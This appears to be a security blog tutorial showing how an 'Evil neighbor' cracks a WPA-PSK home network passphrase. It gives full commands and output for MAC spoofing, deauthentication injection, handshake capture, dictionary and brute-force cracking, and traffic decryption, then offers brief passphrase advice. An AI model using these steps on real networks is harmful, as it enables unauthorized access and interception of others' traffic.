How safe is your Wireless network? Even if you are using WPA-PSK?
It’s possible to run a series of attacks that potentially allow compromising a wireless network and obtaining the WPA-PSK passphrase. This is likely because the wireless spectrum is a shared medium which means you and your neighbor might share the same channel and you can see his traffic and vice-versa. More, there are techniques and tools available that allow capturing the WPA-PSK handshake. With this capture you can then run a brute force or dictionary attack against it to obtain the passphrase.
The following exercise illustrates how an Evil neighbor can obtain your wireless WPA-PSK passphrase using a variety of offensive techniques and connect to your home or small office network.
This exercise will be executed using backtrack 5 which has all the tools installed but could be done on other Linux distribution or Windows system. In short, to achieve this, Evil just need to put his wireless card in monitor mode, inject packets using a technique known as deuathentication attack. In parallel, capture what is known as the four-way handshake which allows the client and the access point to negotiate the keys used to encrypt the traffic. Then he can run a bruteforce or dictionary attack against it and obtain the passphrase. Let’s see how he can accomplish this:
First he tells the driver for the wireless interface to shut down. Then using macchanger to manipulate the MAC address of the interface and change it to a MAC address for deception purposes. Then he brings the interface up and checks if the MAC address change took effect.
$ ifconfig wlan0 down
$ sudo macchanger –mac=00:de:ad:be:ef:00 wlan0
Current MAC: 00:1d:e0:04:ae:71 (unknown)
Faked MAC: 00:de:ad:be:ef:00 (unknown)
$ sudo ifconfig wlan0 up
$ ifconfig wlan0 | head -1
wlan0 Link encap:Ethernet HWaddr 00:de:ad:be:ef:00
The next step will be to enable monitor mode on wlan0 interface. The monitor mode for wireless card is the same as promiscuous mode for a Ethernet card with one advantage. The wireless spectrum is a shared medium.
$ sudo airmon-ng start wlan0
Interface Chipset Driver
wlan0 Intel 4965AGN iwl4965 – [phy0]
(monitor mode enabled on mon0)
Now, Evil can use airodump-ng wireless packet capture tool to show networks matching WPA encryption (–encrypt wpa) on the interface that is configured as monitor mode.
$sudo airodump-ng -i mon0 –encrypt wpa
After an initial recon and scanning of the available wireless networks. He can select the one who has clients associated with it. In this case the one on channel 8 with the BSSID 00:12:80:ED:41:C0 and SSID SecureHomeNet.
Then, he can capture all raw 802.11 frames for this particular network. With this he can use aircrack-ng and others to crack the wpa2-handshake. To do this airodump-ng is executed on channel 8 (-c 8) with the selected access point MAC address (–bssid). The contents of the capture are written (-w) to file outputfile.
$sudo airodump-ng -c 8 –bssid 00:12:80:ED:41:C0 -w outputfile mon0
While running this and checking which clients are associated with the access point. He opens another shell and can inject packets into this specified wireless network using the MAC address of a client connected to the access point. There are different attacks techniques that can be used. The one used is the deauthentication attack with 5 attempts (–deauth=5). This will allows Evil to capture WPA/WPA2 handshakes by forcing clients to re-authenticate. The (-a) is the MAC address of the access point and the (-h) is the host/client.
$ sudo aireplay-ng –deauth=5 -e SecureHomeNet -a 00:12:80:ED:41:C0 -h 00:24:2C:6F:50:5D mon0
The interface MAC (00:1D:E0:04:AE:71) doesn’t match the specified MAC (-h).
ifconfig mon0 hw ether 00:24:2C:6F:50:5D
10:30:04 Waiting for beacon frame (BSSID: 00:12:80:ED:41:C0) on channel 8
NB: this attack is more effective when targeting a connected wireless client (-c <client’s mac>).
10:30:04 Sending DeAuth to broadcast — BSSID: [00:12:80:ED:41:C0]
10:30:05 Sending DeAuth to broadcast — BSSID: [00:12:80:ED:41:C0]
10:30:05 Sending DeAuth to broadcast — BSSID: [00:12:80:ED:41:C0]
10:30:05 Sending DeAuth to broadcast — BSSID: [00:12:80:ED:41:C0]
10:30:06 Sending DeAuth to broadcast — BSSID: [00:12:80:ED:41:C0]
If all goes well after the attack finish the handshake should appear in the top right corner of the airodump-ng shell.
He can now stop the airdump-ng verify that he has the four-way handshake and then launch a brute force attack. First using tshark to filter by EAPOL it shows 4 packets.
$ ls -lisa *.cap
2498937 408 -rw-r–r– 1 root root 414162 2012-12-01 05:01 outputfile-01.cap
$ tshark -nnr outputfile-01.cap -R ‘eapol’
2536 337.964671 00:12:80:ed:41:c0 -> 00:24:2c:6f:50:5d EAPOL 155 Key (msg 1/4)
2538 337.981066 00:24:2c:6f:50:5d -> 00:12:80:ed:41:c0 EAPOL 155 Key (msg 2/4)
2540 337.984640 00:12:80:ed:41:c0 -> 00:24:2c:6f:50:5d EAPOL 205 Key (msg 3/4)
2542 337.989262 00:24:2c:6f:50:5d -> 00:12:80:ed:41:c0 EAPOL 133 Key (msg 4/4)
Then, to make sure the handshake is enough to mount a brute force or dictionary attack pyrit can be used with (–r) to read the packet capture using analyze parameter.
$ pyrit -r outputfile-01.cap analyze
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file ‘outputfile-01.cap’ (1/1)…
Parsed 38 packets (38 802.11-packets), got 1 AP(s)
#1: AccessPoint 00:12:80:ed:41:c0 (‘SecureHomeNet’):
#1: Station 00:24:2c:70:fa:5d
#2: Station 20:54:76:27:85:a4
#3: Station 04:54:53:7f:4f:af
#4: Station 00:24:2c:6f:50:5d, 1 handshake(s):
#1: HMAC_SHA1_AES, good, spread 1
The required handshake is obtained. Evil can know mount a offline dictionary attack. He knows that the Wpa pre-shared key can be between 8 and 63 ASCII characters long.
He can first attempt a dictionary attack using aircrack-ng with (–w) to specify the list of words, (–e) to specify the SSID and the packet capture that holds the handshake. The word-lists can be easily obtained from Internet. For example from Openwall website.
$ aircrack-ng -w /pentest/passwords/wordlists/password-2011.lst -e SecureHomeNet outputfile-01.cap
Other than aircrack-ng he could use cowpatty created by Joshua Wright. The command is executed with (-f) to load word-list, (-s) to specify the SSID, (-r) to read the packet capture with the handshake and (-2) in case the capture contains less than the 4 frames in the four-way handshake.
$ cowpatty -f /pentest/passwords/wordlists/password-2011.lst -s SecureHomeNet -r ~/outputfile-01.cap -2
cowpatty 4.6 – WPA-PSK dictionary attack. jwright@hasborg.com
Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack. Please be patient.
key no. 1000: 05091975
key no. 2000: 1010362776
The PSK is “1qaz2wsx”.
Or he could use Pyrit. Pyrit has the ability to use multiple CPUs and GPUs which can be extremely powerful and efficient.
To use pyrit we need three steps : Create an SSID, a password database with an imported wordlist and, finally we launch a brute-force attack using attack_batch
$ pyrit -e SecureHomeNet create_essid
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Connecting to storage at ‘file://’… connected.
Created ESSID ‘SecureHomeNet’
$pyrit -i /pentest/passwords/wordlists/password-2011.lst import_passwords
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Connecting to storage at ‘file://’… connected.
995760 lines read. Flushing buffers…. …
All done.
$pyrit -r ~/outputfile-01.cap -e SecureHomeNet attack_batch
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Connecting to storage at ‘file://’… connected.
Parsing file ‘/home/user/outputfile-01.cap’ (1/1)…
Parsed 38 packets (38 802.11-packets), got 1 AP(s)
Picked AccessPoint 00:12:80:ed:41:c0 automatically…
Attacking handshake with station 00:24:2c:6f:50:5d
Tried 841112 PMKs so far (84.4%); 567 PMKs per second.
The password is ‘1qaz2wsx’.
After obtaining the pass-phrase, it’s game over! Which can potentially be done easily with a good dictionary, Evil can know decrypt the wireless traffic using airdecap. With (-e) to specify the SSID and (-p) for the pass-phrase Airdecap will write a new pcap file with the decrypted traffic.
$ airdecap-ng -e SecureHomeNet -p 1qaz2wsx outputfile-01.cap
Total number of packets read 2939
Total number of WEP data packets 0
Total number of WPA data packets 708
Number of plaintext data packets 0
Number of decrypted WEP packets 0
Number of corrupted WEP packets 0
Number of decrypted WPA packets 17
$ ls -lisa *dec.cap
2499178 8 -rw-r–r– 1 user user 4284 2012-12-01 11:03 outputfile-01-dec.cap
Or use tshark with (-o) to specify preference settings. In this case the wlan.enable_decryption and wlan.web_key parameters. The available settings can been seen with the command $ tshark -G currentprefs | grep wlan.
$tshark -r outputfile-01.cap -o “wlan.enable_decryption:TRUE” -o wlan.wep_key1:wpa-pwd:1qaz2wsx:SecureHomeNet
Further, If the dictionary attack is unsuccessful because the pass-phrase used is not on the dictionary. Other attack vectors are available. Evil can mount a brute force attack which compute all possible passwords combinations. For example from letter a-z and numbers 0-9 using crunch. The drawback is that this will be ineffective, expensive and extremely time consuming.
The following output of crunch illustrates how much space would be needed to generate a word-list with all the combinations possible of lower case alphabet (26 characters) plus numbers range from 0 to 9. Using a pass-phrase of minimum and maximum of 8 characters.
$crunch 8 8 1234567890abcdefghijkmlnopqrstuvxywz
Crunch will now generate the following amount of data: 25389989167104 bytes
24213780 MB
23646 GB
23 TB
0 PB
Evil could combine aircrack-ng with crunch. Basically aircrack-ng accepts passwords from standard input. Then, he can redirect the output from crunch into aircrack-ng. Within crunch its chosen the minimum (8) and maxim password (8) length plus the keyspace
$crunch 8 8 1234567890abcdefghijkmlnopqrstuvxwzy | aircrack-ng -e SecureHomeNet outputfile-01.cap -w –
Or he could use John the Ripper redirecting the output of it to aircrack-ng:
john$ sudo ./john –stdout –incremental:all | aircrack-ng -e SecureHomeNet ~/outputfile-01.cap -w –
Both of this attack will most likely fail. Evil doesn’t know how many characters the pass-phrase has. Plus its using a limited key space which will take a significant amount of time. For example a 5 character password consisting of lowercase, and digits has 200 billion combinations. At the modest rate of 10.000 passwords attempts a second it can be broken in 90 minutes. For a 8 character password consisting of lowercase, uppercase, and digits it has 218 trillion combinations. At rate of 10.000 password attempts a second will take 692 years to break[1]. The best alternative Evil got is to use a good dictionary/word-list or using precomputed hashes (aka rainbow tables).
Other than decrypting the traffic. If Evil obtained your pass-phrase either by brute force or dictionary attack, he can connect to your network. If that happens you are exposed to extremely devastating network attacks such as arp spoofing, phishing, DNS poisoning and others.
How can you defend to this attack ?
The best countermeasure to prevent WPA-PSK attacks is to choose a good pass-phrase Make sure is at least 12 characters long with a combination of numbers, upper and lower case letters plus special characters. In addition, choose a unique SSID. if your SSID is Home, Linksys or one of the top 1000, than most likely there is hash table with precomputed passwords for your SSID.
References:
[1] http://www.lockdown.co.uk/?pg=combi
Hacking Exposed Wireless: Wireless Security Secrets & Solutions
Count Upon Security 